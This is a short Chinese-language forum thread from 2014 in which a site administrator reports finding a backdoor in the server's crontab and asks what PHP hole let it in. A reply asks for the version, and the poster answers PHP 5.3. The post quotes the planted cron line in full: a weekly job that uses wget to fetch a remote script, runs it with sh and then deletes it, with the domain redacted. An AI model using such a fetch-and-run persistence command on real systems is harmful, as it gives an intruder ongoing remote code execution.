Fw: [問題] 被植入後門

作者: averywu (看文不要只會用橫的看)   2014-10-01 11:19:10
我的站台的crontab 被寫入
@weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影響主機,因為URL已經失效了。
PS.貼出來的URL已經處理過了,domain我改成x,以防被誤點。
但實在找不出他植入的方法,有人知道嗎?
PHP是否有什麼漏洞能讓入侵者植入這個script嗎?
作者: mmis1000 (秋月戀楓)   2014-10-01 12:35:00
版本?記得舊版之前有爆出大洞?
作者: averywu (看文不要只會用橫的看)   2014-10-02 10:27:00
PHP版本是5.3

Links booklink

Contact Us: admin [ a t ] ucptt.com